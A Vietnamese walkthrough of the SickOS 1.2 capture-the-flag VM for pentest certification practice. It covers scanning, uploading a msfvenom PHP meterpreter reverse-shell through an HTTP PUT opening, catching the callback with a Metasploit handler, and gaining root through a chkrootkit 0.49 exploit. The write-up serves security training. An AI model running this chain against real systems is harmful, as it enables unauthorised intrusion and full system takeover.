Pentest SickOS 1.2 ( CTF lớp Pentest +, CEH v12, CPENT, LPT, OSCP) :
Hack SickOS 1.2 VM (Thử thách CTF CompTIA Pentest +, CEH v12, CPENT, LPT, OSCP)
Trong hướng dẫn này, chúng ta sẽ giải thích cách giải quyết thử thách SickOs 1.2. Hệ điều hành này là hệ điều hành thứ hai trong chuỗi sau của SickOs và độc lập với các bản phát hành trước đó, phạm vi của thử thách là giành được các đặc quyền cao nhất trên hệ thống. CTF này đưa ra một chiến lược hack có thể được thực hiện để xâm phạm mạng trong một môi trường an toàn.
Đầu tiên tải xuống Sick OS từ đây
Các công cụ sẽ Luyện tập cho tiến trình Pentest+ hay CEH trong bài thực hành này là :
- Network Scanning (Netdiscover, Nmap)
- Directory brute-force (dirb)
- Find HTTP Option : PUT (curl)
- Generate PHP Backdoor (Msfvenom)
- Install Poster (Firefox plug-in)
- Upload and execute a backdoor
- Reverse connection (Metasploit)
- Privilege Escalation (cron job)
- Import python one-liner for proper TTY shell
- Get Root access and capture the flag.
Hãy bắt đầu!!
Trước tiên chúng ta hãy tìm mục tiêu của mình bằng cách sử dụng:
netdiscover
Như hình trên, ta thấy mục tiêu là 192.168.1.109 hãy áp dụng quét nmap:
nmap -A 192.168.1.109
Như bạn có thể thấy rằng cổng 80 đang mở có nghĩa là ta có thể mở IP này trên trình duyệt. Hãy hack nó ?
Mở IP trên trình duyệt sẽ hiện ra hình trên không có tác dụng gì. Bạn có thể thử và xem nguồn của trang nhưng thật không may, bạn sẽ không tìm thấy gì ở đó. Đó là lý do tại sao chúng tôi sẽ sử dụng dirb và để tìm các thư mục. Và đối với loại đó:
dirb http://192.168.1.109
Ta đã tìm thấy thư mục test, hãy mở trong trình duyệt.
192.168.1.109/test/
Nó sẽ cho bạn thấy danh sách các thư mục , hãy để chúng tôi thử và khám phá thư mục kiểm tra thông qua curl .
curl -v -X OPTIONS http://192.168.1.109/test
Khám phá này sẽ cho bạn thấy rằng PUT được cho phép, nghĩa là bạn có thể tải lên bất kỳ tệp nào thông qua nó.
Vì vậy, hãy chuẩn bị tệp độc hại mà bạn sẽ tải lên bằng msfvenom:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.108 lport=443 -f raw
Mặt khác, chạy multi/handler bên trong Metasploit framework.
Sao chép mã từ <?php cho đến die(); và dán nó vào một tệp văn bản có phần mở rộng .php chẳng hạn như shell.php và sẵn sàng tải tệp đã nói lên.
Bây giờ để tải lên tệp .php của bạn, chúng tôi sẽ sử dụng add-on poster. Bấm vào các công cụ từ thanh trình đơn . Và sau đó nhấp vào Poster từ trình đơn thả xuống. Hộp thoại sau sẽ mở ra. Tại đây, duyệt tệp mà bạn sẽ tải lên và nhấp vào tùy chọn PUT .
Nó sẽ cho bạn biết rằng tập tin đã được tải lên
Và bạn có thể thấy tương tự trên trình duyệt của mình rằng tệp của bạn sẽ được tải lên (như trong trường hợp của chúng tôi, tệp là shell.php) bây giờ hãy chạy tệp bạn vừa tải lên.
Trong khi đó, hãy quay trở lại thiết bị đầu cuối Metasploit và đợi session trả về.
msf use exploit/multi/handler
msf exploit(multi/handler) set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) set lhost 192.168.1.108
msf exploit(multi/handler) set lport 443
msf exploit(multi/handler) exploit
Từ hình ảnh dưới đây, bạn có thể quan sát phiên Meterpreter 1 . Nhưng nhiệm vụ vẫn chưa kết thúc, chúng ta vẫn cần thâm nhập nhiều hơn để leo thang đặc quyền.
Sau đó, chúng ta kiểm tra các công việc định kỳ từ bên trong /etc/crontab và ở đây đã tìm thấy một số công việc theo lịch trình.
Di chuyển xa hơn, hãy nhập nội dung sau để khám phá thêm và tìm thứ gì đó có thể khai thác được:
cat /etc/crontab
Lệnh trên sẽ cung cấp cho bạn danh sách các tệp. Khi quan sát, bạn có thể thấy rằng có chkrootkit. Một số phiên bản của nó có thể khai thác được, do đó chúng tôi sẽ kiểm tra phiên bản của nó :
chkrootkit -V
Nó sẽ hiển thị cho bạn phiên bản 0.49
Với sự trợ giúp của Google, chúng tôi đã biết rằng Metasploit chứa một khai thác để khai thác chkrootkit. Sau khi nhập lệnh sau như được hiển thị trong hình ảnh đã cho để tải mô-đun exploit/unix/local/chkrootkit , sau đó đặt session 1 và lport tùy ý, chẳng hạn như 8080 và chạy mô-đun.
Điều này sẽ tạo ra một phiên làm việc khác, như bạn có thể thấy chúng tôi đã tạo ra trình bao lệnh của máy mục tiêu. Bây giờ nếu bạn kiểm tra uid bằng cách nhập id nó sẽ hiển thị uid=0 là root .
id
cd /root
Và để xem danh sách các tệp trong /root gõ :
ls -lsa
Trong danh sách, bạn sẽ thấy có một tệp văn bản và đọc loại tệp đó:
cat 7d83aaa2bf93d8040f3f22ec6ad9d5a.txt
Tác giả : Yashika Dhir (HA)